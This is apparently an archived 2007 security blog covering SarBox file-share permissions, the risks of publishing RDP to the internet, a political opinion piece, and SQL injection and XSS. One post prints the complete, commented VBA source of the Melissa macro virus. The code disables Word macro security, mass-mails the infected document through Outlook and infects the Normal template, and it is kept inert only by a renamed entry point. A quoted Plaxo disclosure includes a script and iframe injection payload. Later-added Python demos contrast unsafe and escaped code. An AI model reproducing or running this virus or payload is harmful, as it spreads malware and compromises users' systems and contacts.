
Wednesday, 24 Jan 2007

A question was raised on SecurityFocus MS on the impact that SarBox (and other corporate governance legislation) might have on setting up security on file servers, in particular how it relates to setting up share permissions. The questioner wished to know what he should do to pass an audit on his share permissions.

While setting correct share permission is by no means the be-all and end-all of a SarBox audit, the following covers this particular area...

The central tenets of applying Sarbanes-Oxley to IT systems are (in the light of clear guidance being rather lacking in the legislation itself):

Minimal, provable, repeatable, auditable.

In other words, when applying permissions you stick to the least privilege model, you document your settings, you log access, you log attempts to change or circumvent the permissions, and you put under change control both alterations to the permissions and who receives them. These steps should get you through your audit.

Obviously, each user must be personally accountable, so unless there is a clear business requirement (and hence a process required), each user must have a personal, non-shared account.

I have found that the real trick of compliance is not to pass the audit in the first year, but to be able to pass the audit every year, without spending all your time on SarBox compliance work and getting bogged down in paperwork.

Lastly, Full Control anywhere is a bad idea, and there is very rarely a need for it outside of the administrators (and surprisingly rarely even then). Full Control on share permissions will permit the users connecting to that share to alter permissions on the files they have created (i.e. own), up to and including denying themselves access. This potentially complicates backups, and as it requires the admin to take ownership of the file or folder to repair such actions, it also messes up any quota system you have put in. I have personally never seen a case where share permissions of Everyone: Full Control were a good idea, and I was very glad to see that Windows 2003 removed that as the default setting on new shares.

Friday, 12 Jan 2007

As the result of some recent discussions on one of the online security lists I have been asked a few questions on the issues of publishing Terminal Services (Remote Desktop Protocol or RDP) to the internet without the benefit of a VPN to protect the TS server. I thought I'd post the standard answer here:

RDP/Terminal Services listens on port 3389.

It is a well-known port and will therefore be subject to attack within hours of you allowing it inbound on your firewall. I personally see around 300 attacks a week on my personal systems for just this potential vulnerability. I don't even have this port open; the attacks are due to a dumb agent probing vast ranges of IP addresses on the off chance that some will respond. Later, the responding IPs are subjected to a more considered attack.

While it is simple to secure the listening server with an account lockout policy that permanently locks accounts after a small number of failed attempts, hence defeating brute force attacks, you are still totally vulnerable to flaws in the intermediate services. These might take the form of the following:

Man-in-the-middle type attacks.
This is where your credentials are sniffed from the ether, typically by targeting the client rather than the server. Your credentials are then used to impersonate you, and unless you are diligently reading your logs you'll likely never know.

DNS Hijacking or Phishing
This is where you think you're attaching to your server, but in reality are attaching to someone else's. You mistakenly log into their fake service, and after it shows you some fake but legitimate-looking error, your credentials are again used to impersonate you.

Attacks directly on the RDP/TS Service.
This is where the attacker uses flaws in the software itself to directly hack your server. In recent times it has mostly been the buffer overflow, but now that these vulnerabilities are generally sorted out by Microsoft before the product goes to market, more highly skilled attackers are returning to the much older methods of malformed requests and TCP packets. A typical scenario is where invalid data causes the service to crash in a way that leaves the attacker's code running on the server, giving them control of it. It might sound like Sci-Fi, but this is exactly how software was commonly hacked for years before script kiddies came along.

There are probably another dozen good reasons for not publishing RDP/Terminal Services directly to the internet, but this should scare you enough to put in a VPN or some other form of intermediate security.

Monday, 8 Jan 2007

Calm down, you're NOT in danger!

I found this in my archives this evening. It's PERFECTLY safe in this form, but your AV scanner will find it in your temporary internet files cache and go a bit nuts. Don't worry, it can't get you; just delete it or whatever. Unless you copy this code into a Word VBA module, save it and then run it, you CANNOT BE ADVERSELY AFFECTED!

Feeling better now? Onto the post...

It's the commented source code for the Melissa virus (remember that puppy!). I managed to cause an international incident when I posted this the first time (back in April 1999), but in the interests of education, here it is again. It can't really do any harm these days as all its attack vectors are well covered by modern AV software, but as the first email-aware macro virus it defined a new and worrying world for us.

Enjoy!



' Melissa Virus
' DO NOT RUN
' Reverse Engineered and Commented by James D. Stallard

Private Sub Document_Open1()

' Originally ran from Document_Open(), but this was altered to protect the viewer

' Hide error messages and keep going regardless
On Error Resume Next

' Check for the Registry Key

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

' If it exists remove your protection
' Switch off the menu option to alter macro security in Word 2000
' Set the Word2000 security level to its lowest level

CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else

' If it doesn't exist remove your protection
' Switch off the macro menu options in Word 97
' Turn off the warnings

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

' Declare some variables
' Instantiate a default email object, works even if Outlook is not actually running
' Initialise MAPI for use

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")


If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

' Check for the Registry Key
' If it exists

If UngaDasOutlook = "Outlook" Then

' Check that Outlook is your default MAPI Client
' Logon to the default MAPI profile using the default/saved password

DasMapiName.Logon "profile", "password"

' Hunt for all your address lists

For y = 1 To DasMapiName.AddressLists.Count

' Pick the first address list from the list

Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

' Loop through the first fifty entries in the current address list
' And add each entry to the recipients list
' Note: each entry could be another address list in its own right

For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo

' Build outgoing email Subject and Body
' Attach the current Word DOC
' Note: The new attachment will be this DOC not necessarily LIST.DOC
' Send the offending email

BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send

' Reset the recipients list

Peep = ""

' Do the whole thing again for the next address list until they are all done

Next y

' Logoff the MAPI Profile

DasMapiName.Logoff

End If

' Set the Registry entry to avoid re-sending the mail from the current victim

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

' Current Document infection code
' This is redundant in the live virus, but could be altered to delete itself upon re-infection
' The virus checks first for the existence of the code and then its name
' For the current document and the default template file
' Variables and objects using prefixes AD and NT refer to Active Document and Normal Template

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)

NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

' If the code module in the current document is not called "Melissa" then rename it to "Melissa"

If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

' If the code module in the default template file is not called "Melissa" then rename it to "Melissa"

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

' If both the active document and the normal template are infected then goto the code beginning CYA:

If DoNT <> True And DoAD <> True Then GoTo CYA

' If the Normal Template is not infected
' The code infects the Normal Template by copying the virus code into it line by line - odd

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")

Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop

End If

' If the Active Document is not infected
' The code infects the Active Document by copying the virus code into it line by line - odd

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")

Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop

End If

' If the current document has a filename, other than containing the word "Document"
' Note: This is because when a document is first created its default filename is "DocumentN", N being a number
' Unless the template properties are altered, but this happens rarely
' If filename OK (not "DocumentN")
' Save the document under the current filename
' If filename not OK (contains "DocumentN")
' Set the saved flag to true

CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

' The following comments are unaltered from the original

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

' Payload
' Small and non damaging message is displayed
' If the number of todays date is the same as the number of the current minute then display the message in quotes below

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

' The message is a quote from Bart Simpson from The Simpsons it refers to a scrabble game he won against Lisa
' The attributed author's (Kwyjibo) name is the Word Bart used to get the high score mentioned above

End Sub



Sorry, but the permanent links function on this blog died, and the fix is not quite what you would expect.

An annoying problem with the database caused me to have to restore it entry by entry and the original article numbers were lost when the primary key on the table incremented from the existing highest record number - instead of from 0.

Everything is still there, just not at the same place.

Cheers,
James

The former Education Secretary, Ruth Kelly has been forced to defend her decision to send her son, who has "substantial learning difficulties", to a private school.

What?

Never mind that the poor kid might have a minor case of dyslexia (something which needn't hold you back these days) and now has to be saddled with the moniker "Special Needs" for the rest of his life. As if it wasn't bad enough to be the son of a Labour MP, and one who supports the pointless and expensive Iraq war at that.

Never mind that it's none of our business, or that of the press, or that of any one of the politicians, pundits and commentators who feel the need to lambast the woman.

Never mind that the decision of a parent to send their child to a private school is their decision alone.

Never mind the usual and pathetically predictable raft of idiotic Labour backbenchers whining on that money means you can 'opt out' of the state education system. Actually you don’t 'opt out', you in effect pay twice, you bunch of craven sound-bite muppets.

Never mind that the equally idiotic council of Tower Hamlets feels the need to defend its state school provision for children with special needs and thus fan the flames of self-righteous lip-flapping.

Never mind the fact that the yapping press still sees fit to stick its nose in places that are not in the public interest, seemingly to sell papers to Labour voters.

Ruth Kelly as a politician deserves little more than our disappointed indifference. Ruth Kelly as a parent deserves our support and her privacy.

The real tragedy here is that the poor kid in question will spend 2 years in a top school that will allow him to almost reach his full potential, only to be frog-marched back to the state school system and its attendant lower standards, rife bullying and mean facilities. Rarely has there been such an obvious case of political brinksmanship for no gain, when the only thing at stake is the education and self-esteem of a child.

On the same day as this non-event topped all the news media, 37 people died in a mudslide in Brazil and 18 alleged Islamic militants were killed in China - yet neither of these stories made the front pages.

Pathetic.

Thursday, 4 Jan 2007

What is ' or 1=1 --?

It's pronounced: Apostrophe or one equals one dash dash. It lives at http://www.apostropheor1equals1dashdash.com/

I can't possibly explain it any better than Thor HOG. So, in his own words:



Basically, this got started from a thread over on Pen-test where we were talking about the legality of "testing" a web app or portal for potential security/injection issues and what is and isn't legal/ethical. Many stipulated that simply typing in something like ' or 1=1-- (your standard check for SQL injection) was a violation of the law and an attempt at "hacking." Sadly, there was actually a case where a guy doing something similar (think he did some ../../ stuff in a URL) got arrested and had to defend himself against possible charges because the admin claimed it was an attack. I basically contend two things: one, if someone publishes a web form out there, I have every "right" to put whatever I want in that web form, particularly if it is a site where I'm about to make some sort of purchase or submission of personal information, without fearing that I'll get arrested. That's not to say that I have a right to hork their DB if I can indeed perform SQL injection-- that's a different story-- but one should be able to type in ' or 1=1 -- without fear of arrest. Two, the amount of SQL injection still out there is amazing given this day and age. Sure, I can see it 5 years ago, but there's really no excuse for it now.

Enter ' or 1=1--. That's the legal name of the entity. People can now freely type in ' or 1=1-- into a web form to specify the organization they are associated with, or to search a site to see if the portal is a member of ' or 1=1--. If the name of our organization happens to cause an error on the site, two things happen-- the person typing it in is "protected" by being able to reference a pre-existing, legal entity of that name, and hopefully, the site admin gets a free initial lesson in security without having it come from a full-fledged break-in.


So ' or 1=1 -- is an attempt to further the cause of security against SQL injection, while protecting those proponents from the misguided arm of the law.
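The scenario Thor HOG describes, as an added example that is not part of the original post: a member-organisation search built by string concatenation against a constructed in-memory SQLite table, beside the parameterised form that treats ' or 1=1 -- as nothing more than an odd name. The table and its contents are assumptions.

```python
import sqlite3

# Constructed sample data standing in for a site's member-organisation table.
MEMBERS = ["Acme Ltd", "Plaxo"]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (org TEXT)")
    con.executemany("INSERT INTO members VALUES (?)", [(m,) for m in MEMBERS])
    return con


def search_unsafe(con, org):
    """Query built by concatenation: whatever the user typed is parsed as SQL.
    Returns the matching organisations, or None if the input broke the query
    (the 'error on the site' that reveals an injectable form)."""
    sql = "SELECT org FROM members WHERE org = '" + org + "'"
    try:
        return sorted(row[0] for row in con.execute(sql))
    except sqlite3.Error:
        return None


def search_safe(con, org):
    """Parameterised query: the driver hands the value to the engine separately
    from the SQL text, so quotes and comment markers in it are just characters."""
    rows = con.execute("SELECT org FROM members WHERE org = ?", (org,))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    con = make_db()
    probe = "' or 1=1 --"
    # The concatenated query becomes: ... WHERE org = '' or 1=1 --'
    print("unsafe:", search_unsafe(con, probe))      # every row comes back
    print("safe:  ", search_safe(con, probe))        # no organisation has that name
    print("lone quote:", search_unsafe(con, "'"))   # None: the query failed to parse
```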

If SQL injection is news to you then check out the results of a google search. To give a good idea what is possible, and indeed common, I bring you my favourite true story of code injection, courtesy of http-equiv and posted on NTBugTraq back in March 2004:


From: http-equiv at excite dot com
Subject: PLAXO: is that a cure or a disease?
Date: Friday, March 12, 2004

Having a firm belief in unnecessary gadgetry, we recently sent our most senior colleague Liu Die Yu a request to update his contact information via our plaxo device [http://www.plaxo.com/]. Checking back several hours later in our plaxo web account we eagerly selected his "card" to see what that update might be.

BANG !

<input type="hidden" name="SetReplied" value="">
<input type="hidden" name="perm" value="1">
<input type="hidden" name="saveChanges" value="1">
<input type="hidden" name="close" value="0">
<input type="hidden" name="Biz.FullName" value="fatcat">
<input type="hidden" name="Biz.Title" value="">
<iframe src=http://www.bloatedcorp.com>">
<input type="hidden" name="Biz.Email1" value="fatcat@bloatedcorp.com">
<input type="hidden" name="Biz.Email2" value="">
<input type="hidden" name="Biz.Email3" value="">
<input type="hidden" name="Biz.IM" value="">
<input type="hidden" name="Biz.WebPage" value="">

He had taken our entire contact list for a joyride supreme.

Trivial arbitrary code injection into the plaxo user web account. While it does a good job of attempting to defeat this, simple input in the recipient request for update field of "JOB TITLE", gives a real jobbing:

">
<SCRIPT>alert('boop')</SCRIPT>
">
<iframe src=http://www.bloatedcorp.com>

Needless to say should you receive one of these irritating little requests, you'll now know what to do.
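The Plaxo failure above, as an added example that is not part of http-equiv's post: a contact's fields rendered into hidden inputs without escaping, beside the html.escape version, with Python's HTML parser counting the tags a browser would actually see. The field names and the job-title payload are constructed to mirror the post.

```python
import html
from html.parser import HTMLParser

# Constructed sample contact reply (field names and payload are assumptions that
# mirror the Plaxo post): the job-title field carries markup instead of a title.
CONTACT = {
    "Biz.FullName": "fatcat",
    "Biz.Title": '"><script>alert(\'boop\')</script><iframe src="http://www.bloatedcorp.com">',
    "Biz.Email1": "fatcat@bloatedcorp.com",
}


def render_unsafe(fields):
    """Drops each value straight into an attribute. A '"' in the value closes
    the attribute and everything after it is parsed as live markup."""
    return "\n".join(
        f'<input type="hidden" name="{k}" value="{v}">' for k, v in fields.items()
    )


def render_safe(fields):
    """html.escape(quote=True) rewrites '"', '<' and '>' as entities, so the
    browser sees exactly one input element per field whatever the value holds."""
    return "\n".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )


class TagCollector(HTMLParser):
    """Records every start tag the browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    print(tags_in(render_unsafe(CONTACT)))  # ['input', 'input', 'script', 'iframe', 'input']
    print(tags_in(render_safe(CONTACT)))    # ['input', 'input', 'input']
```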

